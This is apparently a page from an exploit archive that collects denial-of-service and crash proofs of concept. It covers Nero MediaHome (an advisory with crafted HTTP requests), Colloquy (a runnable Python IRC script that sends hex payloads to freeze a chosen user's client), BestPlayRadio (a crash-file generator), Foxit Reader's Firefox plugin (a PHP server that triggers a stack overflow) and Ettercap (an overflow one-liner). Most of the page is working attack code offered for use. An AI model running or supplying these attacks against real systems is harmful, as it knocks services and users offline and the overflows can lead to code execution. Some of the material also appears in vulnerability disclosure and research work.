Archive for Dos/Poc

Nero MediaHome 4.5.8.0 Denial Of Service Vulnerability

Nero MediaHome 4.5.8.0 Denial Of Service Vulnerability

Product: Nero MediaHome
Vendor: Nero
Vulnerable Version(s): 4.5.8.0 and probably prior
Tested Version: 4.5.8.0 in Windows 7 SP1
Vendor Notification: November 21, 2012 
Public Disclosure: January 9, 2013 
Vulnerability Type: Improper Handling of Length Parameter Inconsistency [CWE-130], Improper Handling of Undefined Parameters [CWE-236]
CVE References: CVE-2012-5876, CVE-2012-5877
CVSSv2 Base Scores: 3.3 (AV:A/AC:L/Au:N/C:N/I:N/A:P), 3.3 (AV:A/AC:L/Au:N/C:N/I:N/A:P)
Risk Level: Low 
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) 
 
-----------------------------------------------------------------------------------------------
 
Advisory Details:
 
High-Tech Bridge Security Research Lab has discovered multiple remote DoS vulnerabilities in Nero Media Home server, which could be exploited by a malicious person to crash the server remotely.
 
 
1) Improper Handling of Length Parameter Inconsistency in Nero MediaHome server: CVE-2012-5876
 
1.1 The vulnerability exists due to improper handling of the URI length within the "NMMediaServer.dll" dynamic-link library. A remote attacker can send a specially crafted HTTP request of at least 500'000 characters long to port 54444/TCP (Nero MediaHome server's default port) and cause a stack-based buffer overrun that will immediately crash the Nero MediaHome server.
 
Crash details:
 
EIP: 7c921689 mov ecx,[ecx]
EAX: 03b2a808 (  62040072) ->  (heap)
EBX: 003e0000 (   4063232) ->   b@>@>" (heap)
ECX: 00000000 (         0) -> N/A
EDX: 00000000 (         0) -> N/A
EDI: 03b2b000 (  62042112) -> D (heap)
ESI: 03b2a800 (  62040064) ->  (heap)
EBP: 0526f854 (  86440020) -> &|&B>>D&$|>|&>"|>>"&& |(|"|||X<&><& |(|>s|>@>.D. (stack)
ESP: 0526f848 (  86440008) -> >">&|&B>>D&$|>|&>"|>>"&& |(|"|||X<&><& |(|>s|>@>. (stack)
+00: 003e0000 (   4063232) ->   b@>@>" (heap)
+04: 00000022 (        34) -> N/A
+08: 003e0004 (   4063236) ->   b@>@>" (heap)
+0c: 0526f88c (  86440076) -> &$|>|&>"|>>"&& |(|"|||X<&><& |(|>s|>@>.D. D&|>|>|h& (stack)
+10: 7c928ccd (2089979085) -> N/A
+14: 00000000 (         0) -> N/A
 
 
Disasm around:
 
0x7c921664 mov ecx,[ebp+0x10]
0x7c921667 add eax,[ecx]
0x7c921669 cmp eax,0xfe00
0x7c92166e ja 0x7c920721
0x7c921674 cmp byte [ebp+0x14],0x0
0x7c921678 jnz 0x7c95ae10
0x7c92167e mov ecx,[esi+0xc]
0x7c921681 lea eax,[esi+0x8]
0x7c921684 mov edx,[eax]
0x7c921686 mov [ebp+0x8],ecx
0x7c921689 mov ecx,[ecx]
0x7c92168b cmp ecx,[edx+0x4]
0x7c92168e mov [ebp+0xc],edx
0x7c921691 jnz 0x7c921734
0x7c921697 cmp ecx,eax
0x7c921699 jnz 0x7c921734
0x7c92169f push esi
0x7c9216a0 push ebx
0x7c9216a1 call 0x7c920684
0x7c9216a6 mov eax,[ebp+0xc]
0x7c9216a9 mov ecx,[ebp+0x8]
 
 
Proof of Concept:
The following HTTP request will crash the vulnerable Nero MediaHome server remotely:
 
GET /[A * 500000] HTTP/1.1
HOST: somehost.com
ACCEPT: */*
Accept-Encoding: None
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Connection: Close
Accept-Transfer-Encoding: None
 
 
 
1.2 The vulnerability exists due to improper handling of the URI length within the "NMMediaServer.dll" dynamic-link library. A remote attacker can send a specially crafted HTTP HEAD request of at least 265'696 characters long to port 54444/TCP and cause a heap-based buffer overrun that will cause an immediate crash of Nero MediaHome server.
 
Crash details:
 
EIP: 7c921689 mov ecx,[ecx]
EAX: 03b63008 (  62271496) ->  (heap)
EBX: 003e0000 (   4063232) -> #  8@>+ (heap)
ECX: 00000000 (         0) -> N/A
EDX: 00000000 (         0) -> N/A
EDI: 03b64000 (  62275584) -> B (heap)
ESI: 03b63000 (  62271488) ->  (heap)
EBP: 0527f864 (  86505572) -> '|@'A>|B'$|>>"|>>('' |(|"||x>Bt'><' |>@'w4' |`|]| (stack)
ESP: 0527f858 (  86505560) -> >!>'|@'A>|B'$|>>"|>>('' |(|"||x>Bt'><' |>@'w4' | (stack)
+00: 003e0000 (   4063232) -> #  8@>+ (heap)
+04: 00000021 (        33) -> N/A
+08: 003e0004 (   4063236) -> #  8@>+ (heap)
+0c: 0527f89c (  86505628) -> '$|>>"|>>('' |(|"||x>Bt'><' |>@'w4' |`|]|I||>|h'|'' (stack)
+10: 7c928ccd (2089979085) -> N/A
+14: 00000000 (         0) -> N/A
 
 
Disasm around:
 
0x7c921664 mov ecx,[ebp+0x10]
0x7c921667 add eax,[ecx]
0x7c921669 cmp eax,0xfe00
0x7c92166e ja 0x7c920721
0x7c921674 cmp byte [ebp+0x14],0x0
0x7c921678 jnz 0x7c95ae10
0x7c92167e mov ecx,[esi+0xc]
0x7c921681 lea eax,[esi+0x8]
0x7c921684 mov edx,[eax]
0x7c921686 mov [ebp+0x8],ecx
0x7c921689 mov ecx,[ecx]
0x7c92168b cmp ecx,[edx+0x4]
0x7c92168e mov [ebp+0xc],edx
0x7c921691 jnz 0x7c921734
0x7c921697 cmp ecx,eax
0x7c921699 jnz 0x7c921734
0x7c92169f push esi
0x7c9216a0 push ebx
0x7c9216a1 call 0x7c920684
0x7c9216a6 mov eax,[ebp+0xc]
0x7c9216a9 mov ecx,[ebp+0x8]
 
 
Proof of Concept:
The following HTTP request will crash the vulnerable Nero MediaHome server remotely:
 
HEAD / [A * 265696] HTTP/1.1
ACCEPT: */*
Accept-Encoding: None
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Connection: Close
Accept-Transfer-Encoding: None
 
 
 
1.3 The vulnerability exists due to improper handling of the HTTP OPTIONS method length within the "NMMediaServer.dll" dynamic-link library. A remote attacker can send a specially crafted packet of at least 265'712 characters long to port 54444/TCP and cause a heap-based buffer overrun that will immediately crash the Nero MediaHome server.
 
Crash details:
 
EIP: 7c920a1b cmp ecx,[edx+0x4]
EAX: 03c1bb90 (  63028112) ->  >>#H"G^^^^o^I@_lhf19fPf36dLaExe (heap)
EBX: 003e0000 (   4063232) ->   @>+ (heap)
ECX: 03c1bb90 (  63028112) ->  >>#H"G^^^^o^I@_lhf19fPf36dLaExe (heap)
EDX: 03b50101 (  62193921) -> N/A
EDI: 03c1bb30 (  63028016) -> yDPyDh8yDh >>#H"G^^^^o^I@_l (heap)
ESI: 03c1bb88 (  63028104) ->  >>#H"G^^^^o^I@_lhf19fPf36dLaExe (heap)
EBP: 033bfc78 (  54262904) -> L;L (stack)
ESP: 033bfc6c (  54262892) -> >xL;L| >0;]| 9 9;FL|>>;|`;A|H>]|@X@8 >@>;;; |`|;9Lx> (stack)
+00: 003e0000 (   4063232) ->   @>+ (heap)
+04: 03c1bb78 (  63028088) ->  >>#H"G^^^^o^I@_lhf19fPf36dLa (heap)
+08: 00000000 (         0) -> N/A
+0c: 033bfd4c (  54263116) -> ;9Lx>x`;x;;xvSxU(@;;;;;hT;('@d;p@?x@@X@X@@ (stack)
+10: 7c92084c (2089945164) -> N/A
+14: 03adb908 (  61716744) -> yDcI C8f8]palueeP>yyyy> @* * (heap)
 
 
Disasm around:
 
0x7c9209fe mov al,[esi+0x5]
0x7c920a01 and al,0x10
0x7c920a03 test al,0x10
0x7c920a05 mov [edi+0x5],al
0x7c920a08 jnz 0x7c920aa0
0x7c920a0e mov ecx,[esi+0xc]
0x7c920a11 lea eax,[esi+0x8]
0x7c920a14 mov edx,[eax]
0x7c920a16 mov [ebp+0xc],ecx
0x7c920a19 mov ecx,[ecx]
0x7c920a1b cmp ecx,[edx+0x4]
0x7c920a1e mov [ebp+0x14],edx
0x7c920a21 jnz 0x7c921752
0x7c920a27 cmp ecx,eax
0x7c920a29 jnz 0x7c921752
0x7c920a2f push esi
0x7c920a30 push ebx
0x7c920a31 call 0x7c920684
0x7c920a36 mov eax,[ebp+0x14]
0x7c920a39 mov ecx,[ebp+0xc]
0x7c920a3c cmp eax,ecx
 
 
Proof of Concept:
The following HTTP request will crash the vulnerable Nero MediaHome server remotely:
 
OPTIONS / [A * 265712]
Host: somehost.com
User-Agent: Mozilla/5.0 (Windows; U)
Accept-Language: en-us,en;q=0.5
Keep-Alive: 300
Referer: http://www.host.com
 
 
 
1.4 The vulnerability exists due to improper handling of the HTTP REFERER header length within the "NMMediaServer.dll" dynamic-link library. A remote attacker can send a specially crafted Referer header of at least 265'566 characters long to port 54444/TCP and cause a heap-based buffer overrun that will immediately crash Nero MediaHome server. 
 
Crash details:
 
EIP: 7c920a19 mov ecx,[ecx]
EAX: 03c3c008 (  63160328) -> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA (heap)
EBX: 003e0000 (   4063232) ->   Tp@>+ (heap)
ECX: 41414141 (1094795585) -> N/A
EDX: 41414141 (1094795585) -> N/A
EDI: 03c1af88 (  63025032) -> B>VTP/1.1Host localhostUser-Agent Mozilla/5.0 (Windows; U)Accept-Language en-us,en;q=0.5Keep-AliB (heap)
ESI: 03c3c000 (  63160320) -> BAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA (heap)
EBP: 0527f828 (  86505512) -> `' (stack)
ESP: 0527f81c (  86505500) -> >!>`'|VAAAAT'A>>B'$|>pgg|' |(|"|||>"|>><'' |(|"||x>'><' | (stack)
+00: 003e0000 (   4063232) ->   Tp@>+ (heap)
+04: 00000021 (        33) -> N/A
+08: 003e0004 (   4063236) ->   Tp@>+ (heap)
+0c: 0527f860 (  86505568) -> '$|>pgg|' |(|"|||>"|>><'' |(|"||x>'><' |>@'X`4' |`| (stack)
+10: 7c928ccd (2089979085) -> N/A
+14: 03ad5600 (  61691392) -> >8*W=>@ 3:X`DS.MetaData.OriginalStreamNumber0[Jp (heap)
 
 
Disasm around:
 
0x7c9209f8 jnz 0x7c95af5f
0x7c9209fe mov al,[esi+0x5]
0x7c920a01 and al,0x10
0x7c920a03 test al,0x10
0x7c920a05 mov [edi+0x5],al
0x7c920a08 jnz 0x7c920aa0
0x7c920a0e mov ecx,[esi+0xc]
0x7c920a11 lea eax,[esi+0x8]
0x7c920a14 mov edx,[eax]
0x7c920a16 mov [ebp+0xc],ecx
0x7c920a19 mov ecx,[ecx]
0x7c920a1b cmp ecx,[edx+0x4]
0x7c920a1e mov [ebp+0x14],edx
0x7c920a21 jnz 0x7c921752
0x7c920a27 cmp ecx,eax
0x7c920a29 jnz 0x7c921752
0x7c920a2f push esi
0x7c920a30 push ebx
0x7c920a31 call 0x7c920684
0x7c920a36 mov eax,[ebp+0x14]
0x7c920a39 mov ecx,[ebp+0xc]
 
 
Proof of Concept:
The following HTTP request will crash the vulnerable Nero MediaHome server remotely:
 
GET / HTTP/1.1
Host: somehost.com
User-Agent: Mozilla/5.0 (Windows; U)
Accept-Language: en-us,en;q=0.5
Keep-Alive: 300
Connection: keep-alive
Referer:[A * 265566]
 
 
 
2) Improper Handling of Undefined Parameters in Nero MediaHome server: CVE-2012-5877
 
2.1 The vulnerability exists due to improper handling of the HTTP HOST header within the "NMMediaServer.dll" dynamic-link library. A remote attacker can send a specially crafted packet with missing HOST HTTP header. The Nero MediaHome server HTTP parser will crash immediately after receiving the aforementioned malformed HTTP request.
 
Crash details:
 
EIP: 10003171 mov [eax+0x18],ebp
EAX: 00000000 (         0) -> N/A
EBX: 037bd090 (  58445968) -> x4xx @R px?x? (heap)
ECX: 039cddea (  60612074) -> localhost (heap)
EDX: 039cddea (  60612074) -> localhost (heap)
EDI: 037bc888 (  58443912) -> ||{sP@OQ6E}{AY+ (heap)
ESI: 037c7fb0 (  58490800) -> `?|`?LPCMH|faudio/l16a| ||MP3| (heap)
EBP: 00000009 (         9) -> N/A
ESP: 0563fad0 (  90438352) -> {s|~{x`)huc1P3quhucuthucuyuuhuhucuuM|$cVhx (stack)
+00: 037bd090 (  58445968) -> x4xx @R px?x? (heap)
+04: 039cdde8 (  60612072) ->  localhostUser-Agent: Mozilla/5.0 (Windows; U)Accept-Language: en-us,en;q=0.5Keep-Alive: 300Connection: keep-aliveReferer: http://www.htbridge.ch (heap)
+08: 00000000 (         0) -> N/A
+0c: 00000001 (         1) -> N/A
+10: 000000b8 (       184) -> N/A
+14: 037c7318 (  58487576) -> hhuA_ARG_TYPE_Result7$*pb$ (heap)
 
 
Disasm around:
 
0x10003156 mov edx,[esi+0x8]
0x10003159 mov ebp,[esi+0xc]
0x1000315c push byte 0x1
0x1000315e push eax
0x1000315f push ecx
0x10003160 push ebx
0x10003161 mov [edi+0x40],esi
0x10003164 mov [esp+0x2c],edx
0x10003168 call 0x10002730
0x1000316d mov ecx,[esp+0x2c]
0x10003171 mov [eax+0x18],ebp
0x10003174 mov ebp,[esp+0x24]
0x10003178 add esp,0x10
0x1000317b mov [eax+0x14],ecx
0x1000317e mov edx,[ebp+0x8]
0x10003181 test edx,edx
0x10003183 mov [esp+0x14],edx
0x10003187 jnz 0x10002ff0
0x1000318d mov eax,[esp+0x24]
0x10003191 push eax
0x10003192 call 0x10002c20
 
 
Proof of Concept:
The following HTTP request will crash Nero MediaHome server remotely:
 
GET / HTTP/1.1
: somehost.com
User-Agent: Mozilla/5.0 (Windows; U)
Accept-Language: en-us,en;q=0.5
Keep-Alive: 300
Connection: keep-alive
Referer: http://www.host.com
 
 
-----------------------------------------------------------------------------------------------
 
Solution:
 
Vendor last response (January 9, 2013):
"Nero Media Home 4 is not maintained anymore since 2009/10 so at the moment we do not have the resources to fix this problem very soon."
 
As a temporary solution it is advised to remove the vulnerable application from your system.
 
-----------------------------------------------------------------------------------------------

Colloquy 1.3.5 / 1.3.6 Denial Of Service Vulnerability

Colloquy 1.3.5 / 1.3.6 Denial Of Service Vulnerability

#!/usr/bin/python3
###################################################################################
#                                                       Wednesday, January 09, 2013
#
#
#
#                    _  _  .__                .__               
#                 __| || |_|  |   ____   ____ |__| ____   ____  
#                 \   __   /  | _/ __ \ / ___\|  |/  _ \ /    \ 
#                  |  ||  ||  |_\  ___// /_/  >  (  <_> )   |  \
#                 /_  ~~  _\____/\___  >___  /|__|\____/|___|  /
#                   |_||_|           \/_____/                \/
#                                    http://www.zempirians.com
#
#          00100011 01101100 01100101 01100111 01101001 01101111 01101110
#
#                
#
#             -=[ Colloquy - A Mac OS X Internet Chat client. ] =-
#          
#                  [P]roof [o]f [C]oncept, Denial of Service
#
#
#
#
###################################################################################
#                                                           #      T E A M        #
#                                                           #######################
#
#  UberLame .......> Provided exploit discovery + payloads
#  Aph3x    .......> Provided main payload attack for this demostration. <3
#       O_O      .......> Built the concept in Python3
#  Apetrick .......> Allowed testing of the exploit against his ipod
#  syk      .......> Allowed testing of the exploit against his iphone5
#
#
###################################################################################
#  SUMMARY     #
################
# 
# This DOS is designed to freeze the client making it impossible to do anything
# with it. The user will need to manually restart the application in order to
# continue using it.
#
# There are over a few dozen ways to crash the Colloquy client, however, we
# will only be showing 3 various methods. These glitches were suppose to be
# fixed in 'Colloquy' 1.3.5, however, they still exist in the lastest release
# of 1.3.6...
#
################
#  VULNERABLE  #
################
#
#   Colloquy 1.3.5 (5534) - iPhone OS 5.1.1 (ARM) - http://colloquy.mobi
#  Colloquy 1.3.6 (5575) - iPhone OS 6.0.2 (ARM) - http://colloquy.mobi
#
################
#  PATCH       #
################
#
#  There is no CVE reported.
#
################
#  PATCH       #
################
#
#  There is no PATCH available.
#
###################################################################################
#                          #                     #
#                          #    H O W - T O      #
#                          #                     #
#                          #######################
#
# Provide the Target: Server, Port, Nickname and the script will deliver
# the payload...
#
# [!USE/]$ ./<file>.py -t <server> -p <port> -n <nickname>
#
###################################################################################
from argparse import ArgumentParser
from time import sleep
import socket
 
 
shellcode = {
# One Shot <3
'one_shot'  : [ \
"687474703a2f2f782f2e2425235e26402426402426232424242425232426",
"23242623262340262a232a235e28242923404040245e2340242625232323",
"5e232526282a234026405e242623252623262e2f2e2f2e2e2f2e2e2f2324",
"2e24" ],
 
# 1.3.5 
'1_3_5'    : [ \
"687474703a2f2f782f3f6964783d2d312b554e494f4e2b53454c45435428",
"292c7573657228292c2873656c6563742532302d2d687474703a2f2f6874",
"74703a2f2f782f3f6964783d2d312b554e494f4e2b53454c45435428292c"
"7573657228292c2873656c6563742532302d2d687474703a2f2f" ],
 
# 1.3.6 - ( Requires Sending 25 Times )
'1_3_6'    : [ \
"687474703a2f2f782f3f6964783d2d312b554e494f4e2b53454c45435428",
"292c7573657228292c2873656c6563742532302d2d687474703a2f2f6874",
"74703a2f2f782f3f6964783d2d312b554e494f4e2b53454c45435428292c",
"7573657228292c2873656c6563742532302d2d687474703a2f2f" ],
}
 
def own( sock, target, sc_key='one_shot' ):
sc = ''.join( shellcode[sc_key] )
targ = ''.join( ''.join( [ hex( ord( ch ) ) for ch in target ] ).split( '0x' ) )
 
msg = "505249564d534720{}203a{}0d0a".format( targ, sc )
 
if sc_key not in '1_3_6':
sock.send( bytes.fromhex( msg ) )
else:
try:
for x in range( 1, 26 ):
sock.send( bytes.fromhex( msg ) )
sleep( .64 )
except:
print( 'FAILED!')
 
 
def connect( uri, port, target, sc_key ):
sock = socket.socket()
try:
ret = sock.connect_ex(( uri, int( port ) ))
sock.recv(8096)
except:
print( "\t[-] Failed To Connect To {}".format( uri ) )
exit()
 
 
sock.send( b"\x4e\x49\x43\x4b\x20\x7a\x65\x6d\x70\x30\x64\x61\x79\x0d\x0a" ) 
sock.send( b"\x55\x53\x45\x52\x20\x7a\x65\x6d\x70\x30\x64\x61\x79\x20\x48\x45\x48\x45\x20\x48\x45\x48\x45\x20\x3a\x3c\x33\x0d\x0a" )
 
while True:
host_data = str( sock.recv( 8096 ).strip() )
 
 
if ' 396 ' in host_data:
print( '\t[+] Connection Successful Sending Payload To {}'.format( target ) )
own( sock, target, sc_key )
sock.send( b'QUIT\r\n' )
sock.close()
break
 
 
try: 
msg = host_data.split()
if msg[0].lower() is 'ping':
sock.send( b"PONG {}\r\n".format( msg[1] ) )
continue
except:
pass
 
 
print( '\t[!] Payload Sent, Target Should Drop Shortly <3' )
 
 
 
if __name__ == '__main__':
parser = ArgumentParser( description='#legion Colloquy IRC DoS; Requires At Least A Nick To Target' )
 
parser.add_argument( '-t', '--target', dest='target', default='localhost', help="IRCD Server Uri To Connect On" )
parser.add_argument( '-p', '--port', dest='port', default=6667, help="Port To Connect On" )
parser.add_argument( '-n', '--nick', dest='nick', metavar='NICK', help="Nick To Target" )
 
parser.add_argument( '-s', '--shellcode', dest='shellcode', default='one_shot',
help='Shell Code To Use, ( one_shot, 1_3_5, 1_3_6 )' )
 
 
 
args = parser.parse_args()
 
if args.nick is None:
parser.print_help()
exit()
 

BestPlayRadio v1.0 (.mp3) Crash PoC

BestPlayRadio v1.0 (.mp3) Crash PoC

#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=#
#     _                   __           __       __                     #
#   /' \            __  /'__`\        /\ \__  /'__`\                   #
#  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           #
#  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          #
#     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           #
#      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           #
#       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           #
#                  \ \____/ >> Exploit database separated by exploit   #
#                   \/___/          type (local, remote, DoS, etc.)    #
#                                                                      #
#  [+] Site            : 1337day.com                                   #
#  [+] Support e-mail  : submit[at]1337day.com                         #
#                                                                      #
#               #########################################              #
#               I'm The Black Devils member from Inj3ct0r Team         #
#               #########################################              #
#-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-#
# Exploit Title: BestPlayRadio  v1.0 (.mp3) Crash PoC
# Version: 4.1
# Date: 2012-01-09
# Software Link: http://www.procesualitatea.ro/bestplay/BestPlayRadio.html
# Author: The Black Devils
# Tested on: Windows XP SP2
# Greeting To : r0073r / KedAns-Dz / Newbie3viLc063s / All DZ Hackerz
 
#!/usr/bin/python
 
file="Dz.mp3"
crash="\x41" * 10000
try:
print "[*] Creating exploit file...\n"
writeFile = open (file, "w")
writeFile.write(crash)
writeFile.close()
print "[*] File successfully created!"
except:
print "[*] Error while creating file!"
 
#------------------
Contact:
https://www.facebook.com/DevilsDz
https://www.facebook.com/necesarios
#------------------

Foxit Reader 5.4.4.1128 Firefox Plugin npFoxitReaderPlugin.dll Stack Buffer Overflow

Foxit Reader 5.4.4.1128 Firefox Plugin npFoxitReaderPlugin.dll Stack Buffer Overflow Açığına ilişkin açıklamalama exploit aşağıdaki gibidir.


<?php /* Foxit Reader <= 5.4.4.1128 Plugin for Firefox npFoxitReaderPlugin.dll Overlong Query String Remote Stack Buffer Overflow PoC --------------------------- rgod

(listener)

Tested against Microsoft Windows Mozilla Firefox 17.0.1 Foxit Reader 5.4.3.0920 Foxit Reader 5.4.4.1128

File: npFoxitReaderPlugin.dll Version: 2.2.1.530

Product url: <a href="http://www.foxitsoftware.com/downloads/">http://www.foxitsoftware.com/downloads/</a> Last version setup file: FoxitReader544.11281_enu_Setup.exe

Usage: Launch from the command line, then browse port 6666 with Firefox. You can test it also through this url:

<a href="http://192.168.0.1/x.pdf?[A">http://192.168.0.1/x.pdf?[A</a> x 1024]

File must be existing or the server should be responding with the proper Content-Type header.

vulnerable code, npFoxitReaderPlugin.dll:

;------------------------------------------------------------------------------  L1000162F:     push ebx     push esi     push edi     mov edi,ebp     or ecx,FFFFFFFFh     xor eax,eax     xor ebx,ebx     xor esi,esi     repne scasb     not ecx     dec ecx     test ecx,ecx     jle L100016E4  L1000164A:     mov al,[esi+ebp]     mov word ptr [esp+18h],0000h     cmp al,25h     jz  L10001661     mov ecx,[esp+1Ch]     mov [ebx+ecx],al     jmp L100016CE  L10001661:     mov al,[esi+ebp+01h]     cmp al,30h     jl  L1000166D     cmp al,39h     jle L1000167D  L1000166D:     cmp al,41h     jl  L10001675     cmp al,46h     jle L1000167D  L10001675:     cmp al,61h     jl  L100016C6     cmp al,66h     jg  L100016C6  L1000167D:     mov dl,[esi+ebp+01h]     inc esi     inc esi     lea ecx,[esp+10h]     mov [esp+18h],dl     push ecx     mov al,[esi+ebp]     lea edx,[esp+1Ch]     push L100450D4     push edx     mov [esp+25h],al     call SUB_L10006421     mov eax,[esp+1Ch]     lea ecx,[esp+24h]     push eax     push L100450D0     push ecx     call SUB_L100063CF     mov eax,[esp+34h]     mov dl,[esp+30h]     add esp,00000018h     mov [ebx+eax],dl     jmp L100016CE  L100016C6:     mov ecx,[esp+1Ch]     mov byte ptr [ebx+ecx],25h  L100016CE:     inc ebx     mov edi,ebp     or ecx,FFFFFFFFh     xor eax,eax     inc esi     repne scasb     not ecx     dec ecx     cmp esi,ecx     jl  L1000164A  L100016E4:     mov edx,[esp+1Ch]     pop edi     pop esi     mov eax,00000001h     mov byte ptr [ebx+edx],00h     pop ebx     pop ebp     pop ecx     retn ;------------------------------------------------------------------------------

this copy loop ends up in overwriting stack pointers, then (by attaching to plugin-container.exe):

(f48.1778): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=0076ed4c ebx=00000341 ecx=002cf414 edx=002cf414 esi=41414141 edi=0076e9e8 eip=10016852 esp=002cf3f8 ebp=75eacdf8 iopl=0         nv up ei pl nz na po nc cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010202 npFoxitReaderPlugin!NP_GetEntryPoints+0x15672: 10016852 8906            mov     dword ptr [esi],eax  ds:0023:41414141=???????? ... Attempt to write to address 41414141 ...

also SEH pointers are overwritten */

error_reporting(0);

set_time_limit(0);

$port = 6666;

$____redirect = "HTTP/1.1 301 Moved Permanently\r\n".                 "Server: Apache\r\n".                 "Location: /x.pdf?".str_repeat("A",1024)."\r\n".                 "Content-Type: text/html\r\n\r\n";

$____boom     = "HTTP/1.1 200 OK\r\n".                 "Server: Apache\r\n".                 "Accept-Ranges: bytes\r\n".                 "Content-Length: 60137\r\n".                 "Content-Type: application/pdf\r\n".                 "Connection: keep-alive\r\n\r\n";

$socket = stream_socket_server("tcp://0.0.0.0:".$port, $errno, $errstr);

if (!$socket) {   echo "$errstr ($errno)\n"; } else {   echo "Listening on public tcp port ".$port." \n";    while ($conn = stream_socket_accept($socket)) {     $line=fgets($conn);     echo $line."\n";     if (strpos($line,".pdf")){       fwrite($conn,$____boom);     }     else {       fwrite($conn,$____redirect);     }     fclose($conn);   }   fclose($socket); } ?>

 

Ettercap 0.7.5.1 Stack Overflow Vulnerability

Ettercap 0.7.5.1 Stack Overflow Açığı bulunmuş olup, Açık hakkındaki exploit ve açıklamalar aşağıdaki gibidir.

 


Title: Ettercap Stack overflow (CWE-121) References: CVE-2012-0722 Discovered by: Sajjad Pourali Vendor: <a href="http://www.ettercap.sourceforge.net/">http://www.ettercap.sourceforge.net/</a> Vendor contact: 13-01-01 21:20 UTC (No response) Solution: Using the patch Patch: <a href="http://www.securation.com/files/2013/01/ec.patch">http://www.securation.com/files/2013/01/ec.patch</a>

Local: Yes Remote: No Impact: low

Affected:  - ettercap 0.7.5.1  - ettercap 0.7.5  - ettercap 0.7.4 and earlier Not affected:  - ettercap 0.7.4.1

---

Trace vulnerable place:

./include/ec_inet.h:27-44 enum {    NS_IN6ADDRSZ            = 16,    NS_INT16SZ              = 2,

ETH_ADDR_LEN            = 6,    TR_ADDR_LEN             = 6,    FDDI_ADDR_LEN           = 6,    MEDIA_ADDR_LEN          = 6,

IP_ADDR_LEN             = 4,    IP6_ADDR_LEN            = 16,    MAX_IP_ADDR_LEN         = IP6_ADDR_LEN,

ETH_ASCII_ADDR_LEN      = sizeof("ff:ff:ff:ff:ff:ff")+1,    IP_ASCII_ADDR_LEN       = sizeof("255.255.255.255")+1,    IP6_ASCII_ADDR_LEN      = sizeof("ffff:ffff:ffff:ffff:ffff:ffff:255.255.255.255")+1,    MAX_ASCII_ADDR_LEN      = IP6_ASCII_ADDR_LEN, };

./include/ec_resolv.h:42 #define MAX_HOSTNAME_LEN   64

./src/ec_scan.c:610-614 char ip[MAX_ASCII_ADDR_LEN]; char mac[ETH_ASCII_ADDR_LEN]; char name[MAX_HOSTNAME_LEN];

./src/ec_scan.c:633-635 if (fscanf(hf, "%s %s %s\n", ip, mac, name) != 3 ||          *ip == '#' || *mac == '#' || *name == '#')          continue;

---

PoC:

sudo ruby -e'puts"a"*2000' > overflow && sudo ettercap -T -j overflow

---

+ Sajjad Pourali  + <a href="http://www.securation.com">http://www.securation.com</a>  + Contact: sajjad[at]securation.com